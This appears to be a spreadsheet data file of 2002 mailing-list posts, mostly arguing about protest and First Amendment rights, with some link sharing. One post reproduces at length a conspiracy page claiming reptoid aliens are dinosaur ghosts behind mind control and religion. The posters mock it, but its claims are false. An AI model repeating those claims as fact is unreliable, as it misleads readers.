&gt; "Unpeaceably disrupting political rallies" is now usually done by police
&gt; with riot gear and pepper spray.
&gt; 
&gt; We had a good one here a month or so ago - a few people peaceably
&gt; strayed from the permit area,
&gt; which was nearly a mile from the site of the meeting of finance
&gt; ministers held here (the motorcade drove
&gt; by it for about 10 seconds), and were immediately gassed,  beaten and
&gt; arrested. Not very muddied at all.
What does that exactly have to do with the statement that
distruption of peacable political assembly has become
a common practice disruption tool?  It's an observation
not a judgement, comment, approval.  You've focused on the
word "muddy" to use it in a different context than the one
I posted.Maybe the distinction I was trying to make was too subtle and
I was trying to be too clever with my writing this morning.
Let me summarize the important parts of my post for you: I
have a premise that there is a difference between free and protected
speech and action.  I think O'Neill on his soapbox doesn't
understand the distinction.All better?  Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;
&gt;&gt; http://www.post-gazette.com/columnists/20020905brian5.asp
GAB&gt; I thought this nekkid URL was going to be about the
GAB&gt; infringement of 1st amendment rights for broadcasters
GAB&gt; and proposed campaign finanice restrictions preventing them
GAB&gt; from making money on advertisements that are deemed
GAB&gt; thinly veiled campaign contributions by some arbitrary
GAB&gt; government board.  As it was posted to "discussion" I
GAB&gt; thought there'd be some.GAB&gt; Instead it's a Post-Gazette column by Brian O'Neill
GAB&gt; lamenting the fact that some people know how to
GAB&gt; fill out a permit so that they can take advantage
GAB&gt; of their right to peaceable assembly.  Obviously
GAB&gt; he's poking fun at the idea that specific groups
GAB&gt; get specific "zones" and that it's not up to the
GAB&gt; police to decide what messages and signs get put into
GAB&gt; what zones to most expediently keep order.  Oh thats right Greg.  Because was explicitly clear that the pro-Bush
folks went out and did the permit dance.   So where in the article is
this again?Lets get something straight here.   This -is- a First Amendment issue.
Public streets, provided one isn't blocking traffic, generally tend to
be sorta ok, at least from my last interpretation of Con Law a few
years ago (I'll feign ignorance wrt the fact that laws may have
changed, and the specific facts in this case are weak).    IF this guy
_was_ merely holding a sign (which it seems was the case for all the
pro-bush folks) he did nothing wrong.  He certainly didn't do enough
of a wrong to warrant a disorderly conduct charge.I'll play with your perspective though.   Lets assume a few things.
If I walk into the city office and tell them I want to peacably
assemble against Bush, do you think they'll give me a permit?
Probably not.   So I lie.   Then the cop does what happened in this
scenario.  HE walks up, checks my permit and finds out that I
falsified my statement to get this said document.   He arrests me.
End of story.GAB&gt; The problem is that politics have gotten so muddied
GAB&gt; nowadays, that shouting down and unpeaceably disrupting
GAB&gt; political rallies that you don't agree with has become
GAB&gt; common practice.  The courts have constantly ruled
GAB&gt; that there are some restrictions on the first amendment.
GAB&gt; They teach you that your very first year of law school.I'll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you're aiding terrorism.   If you challenge the beliefs of
the folks attending the various shadowy G8 conferences, you're an
anarchist, and you're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GAB&gt; I think that given the information as laid out by the story,
GAB&gt; Mr. O'Neill has confused free speech with action.  Free
GAB&gt; speech or even protected speech as practiced by almost 
GAB&gt; every American seems to involve the ability to communicate
GAB&gt; an idea to an unknown audience.  Action involves directing
GAB&gt; a specific comment to a specific well-defined individual or audience
GAB&gt; that has immediate, harmful, and sometimes physical 
GAB&gt; effects that is easily forseeable by any reasonable person. Getting back to my original point.  How do you communicate  an idea to
an unknown audience, if you're miles from where the audience is?   How
do you bypass the rules for being -miles- away from the audience
without violating the rules of the regime?  I don't think Mr. Nell was
throwing pies at Bush.  A sign, the last time I checked, didn't cause
physical injury, or even emotional harm.  If I remember Cohen v.
California, 403 U.S. 15 (1971), its not the individual speaking that
has the requirement to desist, but the individual listening who has
the option to leave.
Just my .02, while its still considered legal.
-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; The problem is that politics have gotten so muddied
&gt; nowadays, that shouting down and unpeaceably disrupting
&gt; political rallies that you don't agree with has become
&gt; common practice.  The courts have constantly ruled
&gt; that there are some restrictions on the first amendment.
&gt; They teach you that your very first year of law school.
&gt;I don't think politics is any muddier. People are becoming increasingly
unethical. It's a breakdown in home training.Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Gregory Alan Bolcer wrote:&gt;at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all.Owen
</t>
  </si>
  <si>
    <t>Looks useful. Hopefully, they'll put up some more material soon.	http://ocw.mit.edu/global/all-courses.html</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
&gt; GAB&gt; The problem is that politics have gotten so muddied
&gt; GAB&gt; nowadays, that shouting down and unpeaceably disrupting
&gt; GAB&gt; political rallies that you don't agree with has become
&gt; GAB&gt; common practice.  The courts have constantly ruled
&gt; GAB&gt; that there are some restrictions on the first amendment.
&gt; GAB&gt; They teach you that your very first year of law school.
&gt;
&gt; I'll agree with Owen on this one.  Muddied my ass.  How hard is it to
&gt; chose between a Republocrat or a Demipublican?   Not very.  Shouting
&gt; down has grown to become the answer because the government, over a
&gt; span of years, and with the help of the Courts -has- limited the
&gt; rights we have as citizens under the First Amendment.Wishful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people.&gt; question the policy about terrorism, or drugs, or Iraq, or Bush in
&gt; general, you're aiding terrorism.   If you challenge the beliefs of
&gt; the folks attending the various shadowy G8 conferences, you're an
&gt; anarchist, and you're herded off to a 'designated protest spot' miles
&gt; away from anything.   Part of the point of speech is to be -heard-.
&gt; I can scream on my soapbox in the forest somewhere, and while thats
&gt; speech, its not effective speech.  People are screaming and shouting
&gt; over the political figures because they cannot be  heard in any other
&gt; way.And where does this end? Shouting down speakers is an obviously stupid
tactic if they are -really- interested in advocating change. Are they such
clueless social morons that they don't see this or are they just interested
in stroking their pathetic egos?OBTW, 'clueless social moron syndrom' does not have political boundaries.Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Bill Stoddard wrote:
&gt; 
&gt; Wishful thinking. People are just bigger dickheads now.nah, they've always been this way.&gt; Culture is changing and it is becoming acceptable to get in
&gt; peoples face and shout them down when you disagree with them.culture changing, yeh.  'those who fail to learn from history..'
what does it tell you when a market chain is named 'bread and circus'
and no-one twigs?
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;
&gt;&gt;Wishful thinking. People are just bigger dickheads now. Culture is changing
&gt;&gt;and it is becoming acceptable to get in peoples face and shout them down
&gt;&gt;when you disagree with them.  The people that do this are NOT
&gt;&gt;disenfranchised. They
&gt;&gt;get their rocks off on being disagreeable assholes. The act of protesting is
&gt;&gt;more important than the actual issue being protested for most of these
&gt;&gt;people.
&gt;&gt;  
&gt;&gt;
OB&gt; In my experience, this is classic "American" behaviour, and I don't 
OB&gt; think its on the increase outside of the US of A.
OB&gt; I am willing to accept the premise that Americans are bigger dickheads 
OB&gt; then they used to be.*sighs*Right.  Because Americans are the only people capable of being
assholes.  Shit.  History keeps fucking up when they keep mentioning
all the historical examples of dickhead-ness that have proceeded the
US.After all, we're the only country who gets unruly when it comes to
issues.   Thats why its always just the Americans at those crazy WTO
meetings...  Right, Owen?-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net wrote:&gt;&gt;&gt;Wishful thinking. People are just bigger dickheads now. Culture is changing
&gt;&gt;&gt;and it is becoming acceptable to get in peoples face and shout them down
&gt;&gt;&gt;when you disagree with them.  The people that do this are NOT
&gt;&gt;&gt;disenfranchised. They
&gt;&gt;&gt;get their rocks off on being disagreeable assholes. The act of protesting is
&gt;&gt;&gt;more important than the actual issue being protested for most of these
&gt;&gt;&gt;people.
&gt;&gt;&gt; 
&gt;&gt;&gt;
&gt;&gt;&gt;      
&gt;&gt;&gt;
&gt;OB&gt; In my experience, this is classic "American" behaviour, and I don't 
&gt;OB&gt; think its on the increase outside of the US of A.
&gt;OB&gt; I am willing to accept the premise that Americans are bigger dickheads 
&gt;OB&gt; then they used to be.
&gt;
&gt;*sighs*
&gt;
&gt;Right.  Because Americans are the only people capable of being
&gt;assholes.  Shit.  History keeps fucking up when they keep mentioning
&gt;all the historical examples of dickhead-ness that have proceeded the
&gt;US.
&gt;
&gt;After all, we're the only country who gets unruly when it comes to
&gt;issues.   Thats why its always just the Americans at those crazy WTO
&gt;meetings...  Right, Owen?
&gt;
&gt;
&gt;
&gt;  
&gt;
A flippant remark that I will probably regret  - sure there's assholes 
everywhere. I just remember a lunch in Spain with
a semi-famous American - I think we had about 10 nationalities at the 
table, and he managed to insult each of them within
15 minutes. A historical perspective makes me think that empires - 
Roman, British, Russian, American, whatever - produce
 a larger proportion of assholes than subject nations (and are more 
likely to have them in positions of authority).
Owen</t>
  </si>
  <si>
    <t>Bill Stoddard wrote:&gt;&gt;GAB&gt;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be.Owen</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: &gt; People are screaming and shouting over the political figures because
&gt; they cannot be heard in any other way.
What, are they illiterate? Mute? What's their problem? If somebody stops
them from posting web pages, or printing newsletters, or talking on the
phone, or organizing their /own/ conference then that would be wrong.I don't think free speech is a license to speak directly at and be in the
physical presence of any particular individual of your choosing - especially
when that individual is busy doing something else and isn't interested.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-09-30 at 09:20, Owen Byrne wrote:
&gt; In my experience, this is classic "American" behaviour, and I don't 
&gt; think its on the increase outside of the US of A.
In my experience, this protest behavior is really only an issue in
"ultra-liberal" coastal cities, which is where I normally live.  It is
part of the culture and that behavior is viewed as acceptable.  For comparison, contrast this with the character of the arguably more
serious protests against Federal government abuse in the inter-mountain
West.  They have a very different idea of what constitutes acceptable
protest practice.  Those protests remain largely civil and polite, if
heated and aggressive, and those involve a far greater percentage of the
local population.  And unlike 99% of the liberal coastal city protests
I've seen, the people protesting in the inter-mountain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don't recall anyone characterizing their
protests as impolite, rude, or violent, but then they have more to lose.
-James Rogers
 jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Mr.,Monday, September 30, 2002, 1:19:12 PM, you wrote:
MF&gt; ----- Original Message -----
MF&gt; From: &gt;&gt; People are screaming and shouting over the political figures because
&gt;&gt; they cannot be heard in any other way.
MF&gt; What, are they illiterate? Mute? What's their problem? If somebody stops
MF&gt; them from posting web pages, or printing newsletters, or talking on the
MF&gt; phone, or organizing their /own/ conference then that would be wrong.Perhaps /cannot be heard in any other way (period)/ was incorrect.
What I meant, was a time-specific occurence.  Sure, there are other
means outside of the circumstance of the occurence. BUt until we're
willing to eliminate the ability to speak in public -only- for the
side that doesn't agree with the political force, and make that part
of the 1st amendment, the parties -are- screaming and shouting over
political figures because they cannot be heard (to those figures) in
any other way.MF&gt; I don't think free speech is a license to speak directly at and be in the
MF&gt; physical presence of any particular individual of your choosing - especially
MF&gt; when that individual is busy doing something else and isn't interested.Sure.  And that goes back to my second argument -- Cohen.   THey can
walk away.   NObody compells them to stand there, I'll agree fully.
But we still have a Constitutional right to speak out against
policies, actions and grievances.Again.  If you want it another way, lets change the Constitution.-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: &gt; the parties -are- screaming and shouting over
&gt; political figures because they cannot be heard (to those figures) in
&gt; any other way.
The right to speak is not the same as the right to be heard by the audience
of the speakers choice.Disruptive protests might be a means to create awareness - but that's a
pretty lame way to do it. If it truly is the only way, then I'm all for it,
but disruption for the sake of showing how committed the protesters are is
pretty weak.</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt;                                                ... webforms /can/
&gt; &gt; accept "U.S. of A" as a country.  Incredible, but true.  Web forms can
&gt; &gt; also accept /multiple/ or even /free-form/ telephone numbers ...Are the people who use procrustean web
forms practices the same ones who don't
accept faxes?When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easier.-Dave&gt;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contents.:::::::::"dumb question: X client behind a firewall?"
&gt; Back in my day, they didn't have ssh. Then again, back in my day,
&gt; they didn't have firewalls.Back in my day, when one changed computer
installations, email would be forwarded
as a courtesy.Now, we seem to have swung so far in the
opposite direction that it makes sense to
ditch addresses every couple of years to
shed spam.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: Owen Byrne 
&gt; A flippant remark that I will probably regret  -
&gt; sure there's assholes everywhere. I just remember a lunch in Spain with
&gt; a semi-famous American - I think we had about 10 nationalities at the
&gt; table, and he managed to insult each of them within
&gt; 15 minutes. A historical perspective makes me think that empires -
&gt; Roman, British, Russian, American, whatever - produce
&gt;  a larger proportion of assholes than subject nations (and are more
&gt; likely to have them in positions of authority).Yep, those that win battles collect tthe spoils.  Lead and breed.  Want it to be
different?  Lead, don't whine.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 30 Sep 2002, Tom wrote:&gt; If the set passes around enough then more people have these works. the
&gt; more folks  that have them now, while they are still legal to have, the
&gt; likely they  will be left behind in the possible/probabale copyright
&gt; chillout..and if  that doesnt happen then more folks than not will stillWe will be getting BlackNet-like guerilla P2P pretty soon. Packaging it 
into wormcode with an initial userbase of a few 100 k to Mnodes gives you 
pretty bulletproof plausible deniability.&gt; have it for uses all manner of shades.
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; MF&gt; I don't think free speech is a license to speak directly at
&gt; and be in the
&gt; MF&gt; physical presence of any particular individual of your
&gt; choosing - especially
&gt; MF&gt; when that individual is busy doing something else and isn't
&gt; interested.Yep. I agree 100%&gt;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IMHO.Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Bill,Monday, September 30, 2002, 5:46:11 PM, you wrote:
&gt;&gt; MF&gt; I don't think free speech is a license to speak directly at
&gt;&gt; and be in the
&gt;&gt; MF&gt; physical presence of any particular individual of your
&gt;&gt; choosing - especially
&gt;&gt; MF&gt; when that individual is busy doing something else and isn't
&gt;&gt; interested.BS&gt; Yep. I agree 100%&gt;&gt;
&gt;&gt; Sure.  And that goes back to my second argument -- Cohen.   THey can
&gt;&gt; walk away.   NObody compells them to stand there, I'll agree fully.
&gt;&gt; But we still have a Constitutional right to speak out against
&gt;&gt; policies, actions and grievances.
&gt;&gt;
&gt;&gt; Again.  If you want it another way, lets change the Constitution.BS&gt; Huh?  Are you saying that whoever has the loudest voice gets to be heard?
BS&gt; Shouting down a public speaker could be considered a form of censorship. If
BS&gt; shouting down public speakers is 'protected' it is only a matter of time
BS&gt; before the people doing the shouting have their tactic used against
BS&gt; them -every single time they open their mouth-. The tactic is stupid and
BS&gt; non-productive and if generally used, will only result in chaos.  The tactic
BS&gt; is just stupid ego-bation at best, unless the goal is to generate chaos.
BS&gt; And humans whose goals and actions in life are to create chaos in society
BS&gt; should be locked up (provided you can accurately identify them, which is not
BS&gt; really possible anyway, but hey, this is my rant :-). IMHO.BS&gt; Bill
No offense or anything, but there's a difference between holding a
sign that doesn't agree with Bush and screaming at him.My sole point, as far as the 1st Amendment goes is that there is more
to this game than just being an angry, liberal youth.  (Which is the
gross culmination of everyone's argument sofar)  The screaming isn't
the most effective method around.  I don't believe I argued that it
was.  But screaming is happening because the means to communicate to
the representatives involved are diminishing, at least as far as the
people doing the screaming are concerned.   For the record, I don't
support the screamers in organized conferences (Such as the Colin
Powell shout-down that was mentioned earlier).  I don't think that
this is what the 1st Amendment was implying.  These folks -do- have a
right to be heard, and I think they have a right to be heard by the
folks they elected in the first place.My point, (my only point) was really more concerned with the cases
such as Mr. Nell.   He wasn't engaged (at least from the limited facts
we have) in a shoutout, but rather in a difference of opinion.   He
has a right to possess this opinion and make it known  to the
representatives that are elected.   A sign is not a shout-out.I think I may have missed (or not accurately addressed) the original
thread switch that took this example and mixed in the screaming
dissenters to the mix.  I was mostly responding with my miffedness in
having broad-brush strokes applied to a group without examining the
policy reasons that might have contributed to it.   IN this case, the
screaming parties are fed up with getting corralled miles away from
the folks they need to speak with.   They're resorting to creative,
offensive and constitutionally challengable means, but its not simply
due to the fact that they're 20 and have lost all decorum.   The 'My
generation never did this ' is all BS.   THere's more to this story,
we just dont' know it all.I hope this clarifies my position.   For the quick rehash:Screaming != Free speech on all cases.
Dissent = Free speech, provided you follow what has been laid down by
the Supremes.K?-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>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tithe.Think of all the people and places that would not get unsolicited mail
if we hadn't invented them.  Though perhaps ordering a free Enron mug
as the King of Hell....I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Catamite.'&amp;&gt; Yes, but this is what normally happened:
&amp;&gt; Engineer: we can put an input validator/parser on the backend to do that.
&amp;&gt; 	.....
&amp;&gt; Creative Director: I don't give a shit. As long as it's in blue. And
&amp;&gt; has a link to my press release.N3kk1D PRR3zzEw33Lz ahR 3V1L, but I thought it had to do with
coldfusion-compatiblie plugins (servlets, whatever) that overhyped
unimplemented features.  Repeatedly.  Openly.  In rakish 10MB
branding-first downloads that meshed well with budgeting policies.
</t>
  </si>
  <si>
    <t xml:space="preserve">Gregory Alan Bolcer:
&gt;I'm not sure since I haven't attended civics class
&gt;in quite some time, but the First Amendment doesn't cover protected speech, 
&gt;hate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worldï¿½s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">One of the most bizarre pages I've seen on the Web. At first I thought it
might be some sort of back-story to a RPG, but, nope, it looks like somebody
believes this.===
http://www.viking-z.org/r20i.htmM09. Dinosaurs Eggs and the Origins of Good and Evil.
DINOSAURS. Reptoid ETs are reported to be 12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bigger.Truth is stranger than fiction. Thus the writer's current scenario is that
there were a race of dinosaurs which developed psychic intelligence to guard
their eggs and young, and who probably preferred to live underground. They
survived the wipe out of the dinosaurs 50 million years ago with difficulty.
They evolved into the Erideans and transferred to a more hospitable planet
(for them) possibly with the help of another race of ETs who wanted slaves
but otherwise had no interest in Earth or mind control.Thus it appears that the current Reptoids are the Spirits or ghosts of the
dinosaurs. They must have been powerful to survive 50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psi.THE ORIGINS OF LOVE, HATE AND PURE MALICE. The following scenario appears to
hold water and can account for the origins of our Universal Subconscious.Dinosaurs laid their eggs and buried them either underground or in piles of
rotting vegetation (a good source of beetles and grubs for young
hatchelings). They did not sit on their eggs to keep them warm, which made
them very vulnerable to drastic climate and temperature change. In order to
keep away predators some at least developed psychic mind control. To do this
they had to capture ownership of the psi of potential predators. This is an
act of hatred and outward looking. While a few dinosaurs did develop the
ability to bear living young, most did not. The dinosaurs got in first and
so their mind control tends to override all other latter minds. They have
become the source of all Satans, devils and demons.Birds on the other hand developed the ability to sit on their eggs and keep
them warm. A hen bird normally lays a series of eggs (say one per day) and
only starts sitting when the clutch is completely laid. Thus all eggs tend
to hatch together as they all have an equal period of warmth. This is
primarily an act of love but inward looking. Bearing live young is not
suitable to a bird of the air. A pregnant pigeon would not fly very far.
Antarctic penguins tuck a single egg between their legs to keep it warm,
even if they are standing on ice.Mammals developed live bearing of their young which is also primarily an act
of love and inward looking. This is especially true as a mammalian female
can not desert her young in the womb in case of emergency as can a bird
sitting on a nest.Dinosaurs developed hate and mind control of others to protect their young,
while birds and mammals developed love. Birds and mammals certainly do hate
all enemies of their young, but this is secondary.If one wants to purge the sources of malice of say a black magician, then
purge his dinosaurs and his dinosaur eggs. Unfortunately most of our
religions are based on dinosaur protection of eggs and thus mind control,
regardless of the front they put out to the public. Religion tends to
concentrate on "How to Brainwash your Neighbour". Conscious thought has
built many mighty empires, theologies and slave control systems out of using
"How to care for and protect one's young" as a foundation.Thus the foulest form of abuse possible is to call something "A load of
dinosaur's eggs". Purging the dinosaurs and dinosaur's eggs of any entity
tends to purge all malice back to its roots.It looks as if mighty immortal minds have built up from small beginnings,
aided and abetted by various occultists and other. As they will insist on
vampiring the living for energy to avoid reincarnation and disturbing the
serenity of the writer, he encourages them to reincarnate.ITEMS FOR INSPECTION. For mind control to take place, then someone must take
control or ownership of the target's psi and pleasure centres. Check for the
following.Nest of dinosaur's eggs, holy dinosaurs, etc.
Eggs, controllers or owners in peoples psi, pleasure centres, pain killing
hormones, abilities, etc.
Mind machines.
The original engraving or engram.
GOD and SATAN appear to be job titles and not entities in their own right. T
hey appear to be dinosaur engravings or engrams. No doubt dinosaurs were the
first job holders.
TIMETRACKS are worth investigating as our complete history from the start of
time.My, our, Man's timetracks, etc.
The time tracks of the Universe, Universal Subconscious, Galactic
Subconscious, etc.
EXTINCT RACES of ETs can cause problems when they live on in vampire mode.
Their virtues may known to channelers but they can also have vices. Whenever
one hears of races which have evolved on to higher planes, suspect that the
higher plane is a vampire one. One may never know what they looked like or
other basic characteristics, which makes linking back a trifle difficult.
Every extinct race, etc.
BLOOD ANCESTORS are also worth investigating as minds can be passed down via
genetic linkages. Some of these can be over 2,000 years old.
Every blood ancestor, ancestral mind, genetic mind, etc.
</t>
  </si>
  <si>
    <t>Wow, talk about a pheenomeenon==
http://www.iamcal.com/software/ami/AmIThisOrNot Dynamic Peer Rating SystemWhat is It?
It's a tool to help you build your own "Am I X Or Not" sites.Where Can I Get It?
Basic Version $20
The basic version lets you build a specific "Am I X" site (example). The
license covers a single installation on a single site.Advanced Version $40
The advanced version lets your users create their own "Am I X" sites
(example). The license covers a single installation on a single site.Installation $20
Either version of the system can be installed on your web server, given FTP
access and MySQL login details.</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.sfgate.com/cgi-bin/article.cgi?file=/gate/archive/2002/09/26/bono
act.DTLOpening arguments are set to begin early next month in Eldred vs. Ashcroft,
a landmark U.S. Supreme Court case that will decide the future of copyright
law, including how and when artists and writers can build upon the work of
others.....To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$10k.One of the goals is to show libraries across the country that they could, if
they wished, add these "virtual holdings" (public domain materials) to their
existing library, at a fixed cost most libraries can afford. This should be
compelling to small libraries in remote areas.- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.thecliffguy.com/cliffs.htmNumerous artists drawing characters on a cliff.
</t>
  </si>
  <si>
    <t xml:space="preserve">Neat stuff. Seems to combine elements of Scientology/Xenu and
David Icke (http://www.davidicke.com/icke/temp/reptconn.html).- Gordon----- Original Message ----- 
From: "Mr. FoRK" 
To: 
Sent: Monday, September 30, 2002 10:11 PM
Subject: Dinosaurs Eggs and the Origins of Good and Evil
&gt; One of the most bizarre pages I've seen on the Web. At first I thought it
&gt; might be some sort of back-story to a RPG, but, nope, it looks like somebody
&gt; believes this.
&gt; 
&gt; ===
&gt; http://www.viking-z.org/r20i.htm
&gt; 
&gt; M09. Dinosaurs Eggs and the Origins of Good and Evil.
&gt; DINOSAURS. Reptoid ETs are reported to be 12 foot high crocodiles walking on
&gt; their hind legs. This is a description of a dinosaur. It now appears in
&gt; Remote Viewing that the Reptoid ETs, dinosaurs and dragons are all linked
&gt; together and that they all originated on Earth. The Erideans who are Reptoid
&gt; derivatives have a home planet (in the Eridanus system) like all other ETs.
&gt; The Reptoids have no reported home planet. They also come over as entities
&gt; with little brain who control their bodies directly by spirit. This is a
&gt; description of a ghost or disincarnate entity regardless of how people see
&gt; them. Thus it could be that the Reptoids, Erideans, Nordics, Anunnaki, but
&gt; not the Greys, all have origins on Earth and have a strong link to Earth
&gt; even if they choose to live elsewhere. The Greys do not appear to have a
&gt; renal or urinary system and this points to them not originating on Earth.
&gt; The definitive work on dragons is "The Flight of Dragons" by Peter
&gt; Dickinson. If dragons did exist in the flesh, they did not survive the long
&gt; bow. Targets do not come much bigger.
&gt; 
&gt; Truth is stranger than fiction. Thus the writer's current scenario is that
&gt; there were a race of dinosaurs which developed psychic intelligence to guard
&gt; their eggs and young, and who probably preferred to live underground. They
&gt; survived the wipe out of the dinosaurs 50 million years ago with difficulty.
&gt; They evolved into the Erideans and transferred to a more hospitable planet
&gt; (for them) possibly with the help of another race of ETs who wanted slaves
&gt; but otherwise had no interest in Earth or mind control.
&gt; 
&gt; Thus it appears that the current Reptoids are the Spirits or ghosts of the
&gt; dinosaurs. They must have been powerful to survive 50 million years and also
&gt; to appear to some people. They have appeared to the writer in remote
&gt; viewing. They are living on as vampire entities. Such immortal minds are
&gt; contagious and can easily jump race and species barriers. If they can be
&gt; encouraged to reincarnate, then the power sources of the black magicians and
&gt; mind controllers will disappear. Encouraging them to reincarnate will help
&gt; so called immortal minds to disappear as immortal minds have great
&gt; difficulty surviving reincarnation. Purging people's dinosaurs should remove
&gt; all perverse psychic abilities not under their control. They are a source of
&gt; Satanic Guardian Angels and demons. They control us by owning our psi. Thus
&gt; if we regain ownership of psi, we must relinquish their control and that of
&gt; all other mind controllers. Encourage people to regain ownership of their
&gt; psi.
&gt; 
&gt; THE ORIGINS OF LOVE, HATE AND PURE MALICE. The following scenario appears to
&gt; hold water and can account for the origins of our Universal Subconscious.
&gt; 
&gt; Dinosaurs laid their eggs and buried them either underground or in piles of
&gt; rotting vegetation (a good source of beetles and grubs for young
&gt; hatchelings). They did not sit on their eggs to keep them warm, which made
&gt; them very vulnerable to drastic climate and temperature change. In order to
&gt; keep away predators some at least developed psychic mind control. To do this
&gt; they had to capture ownership of the psi of potential predators. This is an
&gt; act of hatred and outward looking. While a few dinosaurs did develop the
&gt; ability to bear living young, most did not. The dinosaurs got in first and
&gt; so their mind control tends to override all other latter minds. They have
&gt; become the source of all Satans, devils and demons.
&gt; 
&gt; Birds on the other hand developed the ability to sit on their eggs and keep
&gt; them warm. A hen bird normally lays a series of eggs (say one per day) and
&gt; only starts sitting when the clutch is completely laid. Thus all eggs tend
&gt; to hatch together as they all have an equal period of warmth. This is
&gt; primarily an act of love but inward looking. Bearing live young is not
&gt; suitable to a bird of the air. A pregnant pigeon would not fly very far.
&gt; Antarctic penguins tuck a single egg between their legs to keep it warm,
&gt; even if they are standing on ice.
&gt; 
&gt; Mammals developed live bearing of their young which is also primarily an act
&gt; of love and inward looking. This is especially true as a mammalian female
&gt; can not desert her young in the womb in case of emergency as can a bird
&gt; sitting on a nest.
&gt; 
&gt; Dinosaurs developed hate and mind control of others to protect their young,
&gt; while birds and mammals developed love. Birds and mammals certainly do hate
&gt; all enemies of their young, but this is secondary.
&gt; 
&gt; If one wants to purge the sources of malice of say a black magician, then
&gt; purge his dinosaurs and his dinosaur eggs. Unfortunately most of our
&gt; religions are based on dinosaur protection of eggs and thus mind control,
&gt; regardless of the front they put out to the public. Religion tends to
&gt; concentrate on "How to Brainwash your Neighbour". Conscious thought has
&gt; built many mighty empires, theologies and slave control systems out of using
&gt; "How to care for and protect one's young" as a foundation.
&gt; 
&gt; Thus the foulest form of abuse possible is to call something "A load of
&gt; dinosaur's eggs". Purging the dinosaurs and dinosaur's eggs of any entity
&gt; tends to purge all malice back to its roots.
&gt; 
&gt; It looks as if mighty immortal minds have built up from small beginnings,
&gt; aided and abetted by various occultists and other. As they will insist on
&gt; vampiring the living for energy to avoid reincarnation and disturbing the
&gt; serenity of the writer, he encourages them to reincarnate.
&gt; 
&gt; ITEMS FOR INSPECTION. For mind control to take place, then someone must take
&gt; control or ownership of the target's psi and pleasure centres. Check for the
&gt; following.
&gt; 
&gt; Nest of dinosaur's eggs, holy dinosaurs, etc.
&gt; Eggs, controllers or owners in peoples psi, pleasure centres, pain killing
&gt; hormones, abilities, etc.
&gt; Mind machines.
&gt; The original engraving or engram.
&gt; GOD and SATAN appear to be job titles and not entities in their own right. T
&gt; hey appear to be dinosaur engravings or engrams. No doubt dinosaurs were the
&gt; first job holders.
&gt; TIMETRACKS are worth investigating as our complete history from the start of
&gt; time.
&gt; 
&gt; My, our, Man's timetracks, etc.
&gt; The time tracks of the Universe, Universal Subconscious, Galactic
&gt; Subconscious, etc.
&gt; EXTINCT RACES of ETs can cause problems when they live on in vampire mode.
&gt; Their virtues may known to channelers but they can also have vices. Whenever
&gt; one hears of races which have evolved on to higher planes, suspect that the
&gt; higher plane is a vampire one. One may never know what they looked like or
&gt; other basic characteristics, which makes linking back a trifle difficult.
&gt; Every extinct race, etc.
&gt; BLOOD ANCESTORS are also worth investigating as minds can be passed down via
&gt; genetic linkages. Some of these can be over 2,000 years old.
&gt; Every blood ancestor, ancestral mind, genetic mind, etc.
&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Russell Turpin wrote:
&gt; 
&gt; Gregory Alan Bolcer:
&gt; &gt;I'm not sure since I haven't attended civics class
&gt; &gt;in quite some time, but the First Amendment doesn't cover protected speech,
&gt; &gt;hate speech, or actions. ..
&gt; 
&gt; The first two are wrong. The first amendment DOES
&gt; protect speech the Supreme Court decides it protects
&gt; (duh!), and that happens to include most of what
&gt; people consider hate speech. Unlike many other
&gt; nations, the US has no laws against hate speech, per
&gt; se. And the first amendment is the reason for that.
&gt; 
This was poking fun of the practice of making
up differnt types of speech with different
types of protected status.  I think the
laws specialing out hate and protected speech
are ridiculous.  The point I keep trying to make
is that there's only two types, speech and action. 
I agree, they are all speech and should be 
covered by the First Amendment, butIf hate speech is so protected, why are certain
states trying to prosecute people for it?  There's
only two answers and one of them is wrong.  1) Because hate speech is different and needs to
     have a different level of protection dictated
     by whoever's offended at the time.
  2) It's because it's not just speech, but action.
     A action who's consequences are foreseeable by 
     any reasonable person. Hate speech is mislabeled.  It's really "threat".  I think
they let the mislabeling perpetuate as there's advantage
in being able to counter-threat with loss of liberty and
money through civil and criminal lawsuits for people THEY
don't like.  
Greg&gt; _________________________________________________________________
&gt; Join the world?s largest e-mail service with MSN Hotmail.
&gt; http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">At 05:38 PM 9/30/2002 +0200, Eugen Leitl wrote:
&gt;Looks useful. Hopefully, they'll put up some more material soon.
&gt;
&gt;         http://ocw.mit.edu/global/all-courses.htmlI'll be sure to keep everyone posted on the next update. :)
--
B.K. DeLong
bkdelong@ceci.mit.edu
OpenCourseWare+1.617.258.0360
+1.617.877.3271 (cell)
</t>
  </si>
  <si>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</si>
  <si>
    <t xml:space="preserve">On Tuesday 01 October 2002 01:27 am, Mr. FoRK wrote:
&gt; http://www.rathergood.com/vikings/Some classics from this period, now in a new English translation:
"The Sagas of Icelanders" in trade paperback, from (duh) Viking, in 2000.
